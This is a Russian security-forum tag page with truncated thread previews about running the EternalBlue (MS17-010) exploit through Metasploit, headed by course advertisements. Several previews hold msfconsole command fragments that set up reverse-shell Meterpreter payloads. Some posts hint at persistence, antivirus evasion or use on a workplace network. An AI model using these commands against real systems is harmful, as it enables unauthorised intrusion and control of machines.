• 4 июля стартует курс «Python для Пентестера ©» от команды The Codeby

    Понятные и наглядные учебные материалы с информацией для выполнения ДЗ; Проверка ДЗ вручную – наставник поможет улучшить написанный вами код; Помощь преподавателей при выполнении заданий или в изучении теории; Групповой чат в Telegram с другими учениками, проходящими курс; Опытные разработчики – команда Codeby School, лидер по информационной безопасности в RU-сегменте

    Запись на курс до 15 июля. Подробнее ...

  • 11 июля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 20 июля. Подробнее ...

eternalblue

  1. K

    Meterpreter UAC bypass

    Для начала скажу что хочу добавить файл в автозагрузку windows 7. Юзал классический eternalblue,далее хватал 1-ю сессию meterpreter с помощью exploit/windows/local/bypassuac, потом через ветку реестра Wow6432Node закинул файл в автозапуск,перезагрузился,сессии сдохли,далее файл по сути...
  2. K

    Metasploit Host does NOT appear vulnerable

    Привет всем,ошибка «Хост не выглядит уязвимым» с уязвимостью ms17_010 мучает меня уже около месяца,все было нормально,атаки проходили,но как только я заменил роутер с tp-link на mercusys пошли баги.Я сканировал сеть сперва с помощью сканера eternalblue, потом с nmap и даже с помощью стороннего...
  3. K

    Eternalblue на Windows 7 без Metasploit

    Привет всем, как я могу использовать уязвимость ms17_010_eternalblue в виндовс 7 без самого метасплоит? В инете нашел тему с python,да он мне походит,но нужно каждый раз узнавать pipe коннекта,можно как то без этого? В идеале мне нужен exe файл который можно запускать с параметром а именно с ip...
  4. DGDays

    Не могу использовать ms17_010_eternalblue в Metasploit

    Добрый день! Нашёл такой туториал. В нём используется ms17_010_eternalblue, но мне не удаётся его использовать. Пишет про неизвестную ошибку. Команды: use auxiliary/scanner/smb/smb_ms07_010 show options set RHOSTS <IP Address> run use exploit/windows/smb/ms17_010_eternalblue show options set...
  5. K

    Metasploit eternalblue_win8

    Привет,использую metasploit на андроид,пытаюсь выбрать exploit/windows/smb/ms17_010_eternalblue_win8 Пишет:Failed to load module Я понимаю английский(не удалось загрузить модуль) Пошел по пути расположения этого эксплоита,оказалось он написан на python(это ожидалось) Есть решение данной...
  6. A

    При попытке использовать в msfconsole модуль exploit/windows/smb/ms17_010_eternalblue_win8 выдает ошибку: Failed to load module

    При попытке использовать модуль exploit/windows/smb/ms17_010_eternalblue_win8 в msfconsole выдает ошибку: Failed to load module:exploit/windows/smb/ms17_010_eternalblue_win8. Kali linux 2020.2, версия msf - 5.0.93-dev. Стоит отметить, что этот модуль на python, а не на ruby, однако другие модуле...
  7. R

    Не работает эксплоит ms17-0101 metasploit

    Пытаюсь пройти машину Blue на TryHackMe (TryHackMe | Blue). Дошел до получения доступа. Предполагается использовать Metasploit, эксплоит windows/smb/ms17_010_eternalblue. Получаю следующий вывод: Started reverse TCP handler on 10.0.2.15:4444 10.10.85.121:445 - Using...
  8. KirsanovS

    Termux/Metasploit

    В общем, такой вопрос: на работе есть вафля, есть уязвимая машина для eternalblue, получаю сессию через termux, все окей. так вот, можно ли эту сессию перенести на мой домашний пк, с моей, соответственно вафлей?
  9. Sagain2

    Kali Linux: Eternalblue x86

    (Ребята, только не бейте, я новичек) Даров, хацкеры. У меня тут возник вопрос. Большая часть эксплоитов в metasploit-framework заточены под windows (7) x64 Теперь встречный вопрос, есть ли эксплоит для windows 7 x86? Пол инета облазил не нашел. Ну или есть его заменители?
  10. O

    EtternalBlue ms17-010_psexec ?

    Привет Кодебай! Тестирую ms17-010_psexec , ms17-010_command, victim - winXP. В теплице, с отключенным AV всё прекрасно. С вкл. AV - сессия от psexec не приходит, AV с матом рубит пэйлоад. ms17-010_command работает и через него получилось создать юзэра и включить telnet. Внимание - вопрос. Как...
  11. S

    Кто сталкивался с такой проблемой?

    Здравствуйте господа, помогите уже что только не делал не чего не выхотит. столкнулся с такой проблемай, есть комп win7 открытый 445 порт, сканировал MSF, NESSUS все говорят тачка уязвима. Запускаю exploit/windows/smb/ms17_010_eternalblue нажимаю run. и вот что появлеяться Started reverse TCP...
  12. kasperai

    Проблема с эксплоитом eternal blue doublepulsar

    Проблема вот такая, эксплоит использую не раз и каждый раз одна и та же проблема. Выходит ошибка, скрин P.S(Некоторые термины мне будут не понятны)
  13. M

    Решено Старый добрый ms17_010_eternalblue

    Может ли сей эксплоит пробивать машину на которой установлены настройки сети "Общественная сеть", как этого добиться? Рабочую и домашную сеть он пробивает, а при атаке на машину у которой в настройке сети стоит "Общественная сеть" мы получем TimeOut.
  14. R

    Проблема EternalBlue. Did not receive a response from exploit packet.

    Помогите пожалуйста, почему возникает эта ошибка? Можно ли как-то от нее избавиться, и если можно, то как?
  15. M

    Не получается реализовать Eternalblue(ms17_010) из Linux.

    Здравствуйте, пользователи форума. Пытаюсь провести атаку Eternalblue с моего VDS. Буду краток. sudo ./msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/meterpreter/reverse_tcp(пробовал с windows/x64/meterpreter/reverce_tcp) set LPORT 7775 set LHOST *public dns* set...
  16. D

    Не работает Eternalblue

    Что ввожу до запуска: -msfconsole -use exploit/windows/smb/ms17_010_eternalblue -set rhost ******** -exploit Окно после запуска: - Connecting to target for exploitation. [+] - Connection established for exploitation. [+] - Target OS selected valid for OS indicated by SMB reply - CORE raw...
  17. Tayrus

    Статья CVE-2017-0144 |MS17-010

    Всем привет, сегодня я вам покажу как эксплуатировать CVE-2017-0144 начнем. Качаем это: https://www.exploit-db.com/exploits/42315/ и это : https://github.com/worawit/MS17-010/blob/master/mysmb.py и вот это: https://github.com/trustedsec/unicorn Кидаем все в одну папку и создаем файл: touch...
  18. M

    Проблема Аудит Windows 7 x32, Windows Server 2012

    Доброго времени суток, для начала хотелось бы сказать, что я еще ламер. Имеются системы Wndows 7 x32 6.1.7601, Windows Server 2012 x64 6.2.9200 (не R2), они полностью чистые никаких сервисов на них нет, нужно провести их "аудит". Я бы хотел попросить совета, какие эксплоит на них зайдут...
  19. X

    Решено EternalBlue на Termux

    Во-первых, что такое Termux. Termux - это терминал с множеством пакетов, как тот же самый git или nmap. В общем, у Termux'а очень много полезных фич для пентеста и для простого хакинга. Я копался по Codeby, пытался прочитать логи, ибо я криворукий и уже закинув на всю эту затею, я залез поискать...
  20. Lisenok

    MSF сессия

    Доброго времени уважаемые! Произвожу атаку посредством eternalblue на компьютер под управлением windows 7 64bit , атака производится с kali linux, в локальной сети, так вот вопрос в том что до этого просто проверял эксплоит и все работало, то есть после атаки открывалась cmd на на win7, теперь...